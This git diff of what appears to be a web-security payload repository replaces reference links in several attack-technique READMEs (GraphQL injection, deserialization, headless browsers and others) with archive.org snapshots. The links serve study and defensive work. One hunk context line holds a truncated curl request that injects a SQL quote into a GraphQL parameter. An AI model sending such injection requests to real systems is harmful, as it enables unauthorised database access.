+- [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
+- [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 - [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
diff --git a/Google Web Toolkit/README.md b/Google Web Toolkit/README.md
index 691c9fd..bc17ab4 100644
--- a/Google Web Toolkit/README.md	
+++ b/Google Web Toolkit/README.md	
@@ -60,5 +60,5 @@
 
 ## References
 
-* [From Serialized to Shell :: Exploiting Google Web Toolkit with EL Injection - Stevent Seeley - May 22, 2017](https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html)
-* [Hacking a Google Web Toolkit application - thehackerish - April 22, 2021](https://thehackerish.com/hacking-a-google-web-toolkit-application/)
+* [From Serialized to Shell :: Exploiting Google Web Toolkit with EL Injection - Stevent Seeley - May 22, 2017](https://web.archive.org/web/20260220100658/https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html)
+* [Hacking a Google Web Toolkit application - thehackerish - April 22, 2021](https://web.archive.org/web/20210227222455/https://thehackerish.com/hacking-a-google-web-toolkit-application/)
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 0192f55..5a380fa 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -381,21 +381,21 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
 
 ## References
 
-- [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)
-- [Exploiting GraphQL - AssetNote - Shubham Shah - August 29, 2021](https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
-- [GraphQL Batching Attack - Wallarm - December 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
-- [GraphQL for Pentesters presentation - Alexandre ZANNI (@noraj) - December 1, 2022](https://acceis.github.io/prez-graphql/)
-- [API Hacking GraphQL - @ghostlulz - Jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
-- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - Sep 23, 2018](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
-- [GraphQL abuse: Bypass account level permissions through parameter smuggling - Jon Bottarini - March 14, 2018](https://labs.detectify.com/2018/03/14/graphql-abuse/)
-- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - Sept 1, 2019](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
-- [GraphQL cheatsheet - devhints.io - November 7, 2018](https://devhints.io/graphql)
-- [GraphQL Introspection - GraphQL - August 21, 2024](https://graphql.org/learn/introspection/)
-- [GraphQL NoSQL Injection Through JSON Types - Pete Corey - June 12, 2017](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
-- [HIP19 Writeup - Meet Your Doctor 1,2,3 - Swissky - June 22, 2019](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
-- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - 5 November 2018](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
-- [Introduction to GraphQL - GraphQL - November 1, 2024](https://graphql.org/learn/)
-- [Introspection query leaks sensitive graphql system information - @Zuriel - November 18, 2017](https://hackerone.com/reports/291531)
-- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - 8 June 2017](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
+- [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://web.archive.org/web/20230919211552/https://escape.tech/blog/graphql-security-wordlist/)
+- [Exploiting GraphQL - AssetNote - Shubham Shah - August 29, 2021](https://web.archive.org/web/20210830161635/https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
+- [GraphQL Batching Attack - Wallarm - December 13, 2019](https://web.archive.org/web/20260223043402/https://lab.wallarm.com/graphql-batching-attack/)
+- [GraphQL for Pentesters presentation - Alexandre ZANNI (@noraj) - December 1, 2022](https://web.archive.org/web/20230205233412/https://acceis.github.io/prez-graphql/)
+- [API Hacking GraphQL - @ghostlulz - Jun 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
+- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - Sep 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
+- [GraphQL abuse: Bypass account level permissions through parameter smuggling - Jon Bottarini - March 14, 2018](https://web.archive.org/web/20231027032512/https://labs.detectify.com/2018/03/14/graphql-abuse/)
+- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - Sept 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
+- [GraphQL cheatsheet - devhints.io - November 7, 2018](https://web.archive.org/web/20181107093033/https://devhints.io/graphql)
+- [GraphQL Introspection - GraphQL - August 21, 2024](https://web.archive.org/web/20260302160506/https://graphql.org/learn/introspection/)
+- [GraphQL NoSQL Injection Through JSON Types - Pete Corey - June 12, 2017](https://web.archive.org/web/20250514221852/https://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
+- [HIP19 Writeup - Meet Your Doctor 1,2,3 - Swissky - June 22, 2019](https://web.archive.org/web/20190825033521/https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
+- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - 5 November 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+- [Introduction to GraphQL - GraphQL - November 1, 2024](https://web.archive.org/web/20160917011216/http://graphql.org:80/learn)
+- [Introspection query leaks sensitive graphql system information - @Zuriel - November 18, 2017](https://web.archive.org/web/20250710175416/https://hackerone.com/reports/291531)
+- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - 8 June 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
 - [Securing Your GraphQL API from Malicious Queries - Max Stoiber - Feb 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
-- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - Nov 6th 2018](https://hackerone.com/reports/435066)
+- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - Nov 6th 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
diff --git a/HTTP Parameter Pollution/README.md b/HTTP Parameter Pollution/README.md
index 0296463..9218646 100644
--- a/HTTP Parameter Pollution/README.md	
+++ b/HTTP Parameter Pollution/README.md	
@@ -95,6 +95,6 @@ When ?par1=a&par1=b
 
 ## References
 
-* [How to Detect HTTP Parameter Pollution Attacks - Acunetix - January 9, 2024](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
-* [HTTP Parameter Pollution - Itamar Verta - December 20, 2023](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
-* [HTTP Parameter Pollution in 11 minutes - PwnFunction - January 28, 2019](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
+* [How to Detect HTTP Parameter Pollution Attacks - Acunetix - January 9, 2024](https://web.archive.org/web/20260112091623/https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
+* [HTTP Parameter Pollution - Itamar Verta - December 20, 2023](https://web.archive.org/web/20190721110154/https://www.imperva.com/learn/application-security/http-parameter-pollution/)
+* [HTTP Parameter Pollution in 11 minutes - PwnFunction - January 28, 2019](https://web.archive.org/web/20190212095035/https://www.youtube.com/watch?v=QVZBl8yxVX0)
diff --git a/Headless Browser/README.md b/Headless Browser/README.md
index 71fd580..b870500 100644
--- a/Headless Browser/README.md	
+++ b/Headless Browser/README.md	
@@ -181,12 +181,12 @@ const browser = await puppeteer.launch({
 
 ## References
 
-* [Browser based Port Scanning with JavaScript - Nikolai Tschacher - January 10, 2021](https://incolumitas.com/2021/01/10/browser-based-port-scanning/)
-* [Changes to remote debugging switches to improve security - Will Harris - March 17, 2025](https://developer.chrome.com/blog/remote-debugging-port)
-* [Chrome DevTools Protocol - Documentation - July 3, 2017](https://chromedevtools.github.io/devtools-protocol/)
-* [Cookies with Chromium’s Remote Debugger Port - Justin Bui - December 17, 2020](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)
-* [Debugging Cookie Dumping Failures with Chromium’s Remote Debugger - Justin Bui - July 16, 2023](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f)
-* [Node inspector/CEF debug abuse - HackTricks - July 18, 2024](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse)
-* [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely - wunderwuzzi - April 28, 2020](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
-* [Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot - Jopraveen - March 2, 2025](https://jopraveen.github.io/web-hackthebot/)
-* [Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari - Daniel Thatcher - December 6, 2023](https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari)
+* [Browser based Port Scanning with JavaScript - Nikolai Tschacher - January 10, 2021](https://web.archive.org/web/20210119151816/https://incolumitas.com/2021/01/10/browser-based-port-scanning/)
+* [Changes to remote debugging switches to improve security - Will Harris - March 17, 2025](https://web.archive.org/web/20250328233439/https://developer.chrome.com/blog/remote-debugging-port)
+* [Chrome DevTools Protocol - Documentation - July 3, 2017](https://web.archive.org/web/20170703201537/https://chromedevtools.github.io/devtools-protocol/)
+* [Cookies with Chromium’s Remote Debugger Port - Justin Bui - December 17, 2020](https://web.archive.org/web/20201217170910/https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)
+* [Debugging Cookie Dumping Failures with Chromium’s Remote Debugger - Justin Bui - July 16, 2023](https://web.archive.org/web/20250911211108/https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f)
+* [Node inspector/CEF debug abuse - HackTricks - July 18, 2024](https://web.archive.org/web/20241230021023/https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse)
+* [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely - wunderwuzzi - April 28, 2020](https://web.archive.org/web/20260215064320/https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
+* [Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot - Jopraveen - March 2, 2025](https://web.archive.org/web/20250303031943/https://jopraveen.github.io/web-hackthebot/)
+* [Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari - Daniel Thatcher - December 6, 2023](https://web.archive.org/web/20231206141057/https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari)
diff --git a/Hidden Parameters/README.md b/Hidden Parameters/README.md
index f5c808c..cf46001 100644
--- a/Hidden Parameters/README.md	
+++ b/Hidden Parameters/README.md	
@@ -46,5 +46,5 @@ Explore all the URL from your targets to find old parameters.
 
 ## References
 
-* [Hacker tools: Arjun – The parameter discovery tool - Intigriti - May 17, 2021](https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/)
+* [Hacker tools: Arjun – The parameter discovery tool - Intigriti - May 17, 2021](https://web.archive.org/web/20230930093635/https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/)
 * [Parameter Discovery: A quick guide to start - YesWeHack - April 20, 2022](http://web.archive.org/web/20220420123306/https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start)
diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md
index 201697b..c686821 100644
--- a/Insecure Deserialization/DotNET.md	
+++ b/Insecure Deserialization/DotNET.md	
@@ -170,16 +170,16 @@ List of popular gadgets used in common payloads.
 
 ## References
 
-* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - Slides - James Forshaw - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf)
-* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - White Paper - James Forshaw - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
-* [Attacking .NET Deserialization - Alvaro Muñoz - April 28, 2018](https://youtu.be/eDfGpu3iE4Q)
-* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11)
-* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - HackTricks - July 18, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net)
-* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html)
-* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - April 23, 2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
-* [Finding a New DataContractSerializer RCE Gadget Chain - dugisec - November 7, 2019](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/)
-* [Friday the 13th: JSON Attacks - DEF CON 25 Conference - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://www.youtube.com/watch?v=ZBfBYoK_Wr0)
-* [Friday the 13th: JSON Attacks - Slides - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
-* [Friday the 13th: JSON Attacks - White Paper - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
-* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - Alyssa Rahman - December 13, 2021](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
-* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Shubham Shah - November 2, 2021](https://blog.assetnote.io/2021/11/02/sitecore-rce/)
+* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - Slides - James Forshaw - September 20, 2012](https://web.archive.org/web/20120920142257/https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf)
+* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - White Paper - James Forshaw - September 20, 2012](https://web.archive.org/web/20260216023308/https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
+* [Attacking .NET Deserialization - Alvaro Muñoz - April 28, 2018](https://web.archive.org/web/20200215071108/https://youtu.be/eDfGpu3iE4Q)
+* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://web.archive.org/web/20250210175031/https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11)
+* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - HackTricks - July 18, 2024](https://web.archive.org/web/20241130213753/https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net)
+* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://web.archive.org/web/20260228021314/https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html)
+* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - April 23, 2019](https://web.archive.org/web/20230402051324/https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+* [Finding a New DataContractSerializer RCE Gadget Chain - dugisec - November 7, 2019](https://web.archive.org/web/20210926153917/http://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/)
+* [Friday the 13th: JSON Attacks - DEF CON 25 Conference - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://web.archive.org/web/20180908194356/https://www.youtube.com/watch?v=ZBfBYoK_Wr0)
+* [Friday the 13th: JSON Attacks - Slides - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://web.archive.org/web/20251117062750/https://blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+* [Friday the 13th: JSON Attacks - White Paper - Alvaro Muñoz (@pwntester) and Oleksandr Mirosh - July 22, 2017](https://web.archive.org/web/20170728193005/https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
+* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - Alyssa Rahman - December 13, 2021](https://web.archive.org/web/20221130214048/https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
+* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Shubham Shah - November 2, 2021](https://web.archive.org/web/20211103083935/https://blog.assetnote.io/2021/11/02/sitecore-rce/)
diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md
index be6e790..fded3a0 100644
--- a/Insecure Deserialization/Java.md	
+++ b/Insecure Deserialization/Java.md	
@@ -297,19 +297,19 @@ Common secrets from the [documentation](https://cwiki.apache.org/confluence/disp
 
 ## References
 
-* [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
-* [Exploiting the Jackson RCE: CVE-2017-7525 - Adam Caudill - October 4, 2017](https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/)
-* [Hack The Box - Arkham - 0xRick - August 10, 2019](https://0xrick.github.io/hack-the-box/arkham/)
-* [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
-* [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
-* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
+* [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://web.archive.org/web/20230927142712/https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
+* [Exploiting the Jackson RCE: CVE-2017-7525 - Adam Caudill - October 4, 2017](https://web.archive.org/web/20260303123815/https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/)
+* [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/)
+* [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
+* [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
+* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 * [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
 * [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
-* [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://www.exploit-db.com/docs/48126)
-* [JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016](https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf)
-* [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
-* [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)
-* [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
-* [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
-* [Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
-* [Friday the 13th JSON Attacks - Alvaro Muñoz & Oleksandr Mirosh - July 28, 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
+* [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126)
+* [JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016](https://web.archive.org/web/20160315020109/http://synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf)
+* [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://web.archive.org/web/20181217131654/https://alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
+* [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://web.archive.org/web/20201207032909/https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)
+* [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021](https://web.archive.org/web/20260210022416/https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
+* [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020](https://web.archive.org/web/20250604040229/https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
+* [Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017](https://web.archive.org/web/20250604034046/https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
+* [Friday the 13th JSON Attacks - Alvaro Muñoz & Oleksandr Mirosh - July 28, 2017](https://web.archive.org/web/20170728193005/https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md
index 65c1704..ee9fc27 100644
--- a/Insecure Deserialization/Node.md	
+++ b/Insecure Deserialization/Node.md	
@@ -50,6 +50,6 @@
 
 ## References
 
-* [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
-* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
-* [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)
+* [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://web.archive.org/web/20190820172715/https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
+* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://web.archive.org/web/20181031111654/https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
+* [NodeJS Deserialization - gonczor - January 8, 2020](https://web.archive.org/web/20240530025137/https://blacksheephacks.pl/nodejs-deserialization/)
diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md
index ca9691d..48616f3 100644
--- a/Insecure Deserialization/PHP.md	
+++ b/Insecure Deserialization/PHP.md	
@@ -242,20 +242,20 @@ A valid PHAR includes four elements:
 
 ## References
 
-* [CTF writeup: PHP object injection in kaspersky CTF - Jaimin Gohel - November 24, 2018](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
+* [CTF writeup: PHP object injection in kaspersky CTF - Jaimin Gohel - November 24, 2018](https://web.archive.org/web/20210514112950/https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
 * [ECSC 2019 Quals Team France - Jack The Ripper Web - noraj - May 22, 2019](https://web.archive.org/web/20211022161400/https://blog.raw.pm/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
-* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 1 - Rémi Matasse - September 12, 2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1)
-* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 2 - Rémi Matasse - October 11, 2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-2)
-* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - xanhacks - August 11, 2022](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)
-* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
-* [phar:// deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
-* [PHP deserialization attacks and a new gadget chain in Laravel - Mathieu Farrell - February 13, 2024](https://blog.quarkslab.com/php-deserialization-attacks-and-a-new-gadget-chain-in-laravel.html)
+* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 1 - Rémi Matasse - September 12, 2023](https://web.archive.org/web/20230915040126/https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1)
+* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 2 - Rémi Matasse - October 11, 2023](https://web.archive.org/web/20231017130212/https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-2)
+* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - xanhacks - August 11, 2022](https://web.archive.org/web/20250926045827/https://www.xanhacks.xyz/p/php-gadget-chain/)
+* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://web.archive.org/web/20200929143500/https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
+* [phar:// deserialization - HackTricks - July 19, 2024](https://web.archive.org/web/20220819225041/https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
+* [PHP deserialization attacks and a new gadget chain in Laravel - Mathieu Farrell - February 13, 2024](https://web.archive.org/web/20240213181951/https://blog.quarkslab.com/php-deserialization-attacks-and-a-new-gadget-chain-in-laravel.html)
 * [PHP Generic Gadget - Charles Fol - July 4, 2017](https://www.ambionics.io/blog/php-generic-gadget-chains)
-* [PHP Internals Book - Serialization - jpauli - June 15, 2013](http://www.phpinternalsbook.com/classes_objects/serialization.html)
-* [PHP Object Injection - Egidio Romano - April 24, 2020](https://www.owasp.org/index.php/PHP_Object_Injection)
-* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
-* [PHP unserialize - php.net - March 29, 2001](http://php.net/manual/en/function.unserialize.php)
+* [PHP Internals Book - Serialization - jpauli - June 15, 2013](https://web.archive.org/web/20130615052058/http://www.phpinternalsbook.com:80/classes_objects/serialization.html)
+* [PHP Object Injection - Egidio Romano - April 24, 2020](https://web.archive.org/web/20130313225253/https://www.owasp.org/index.php/PHP_Object_Injection)
+* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://web.archive.org/web/20200903232359/https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
+* [PHP unserialize - php.net - March 29, 2001](https://web.archive.org/web/20260219122641/https://www.php.net/manual/en/function.unserialize.php)
 * [POC2009 Shocking News in PHP Exploitation - Stefan Esser - May 23, 2015](https://web.archive.org/web/20150523205411/https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
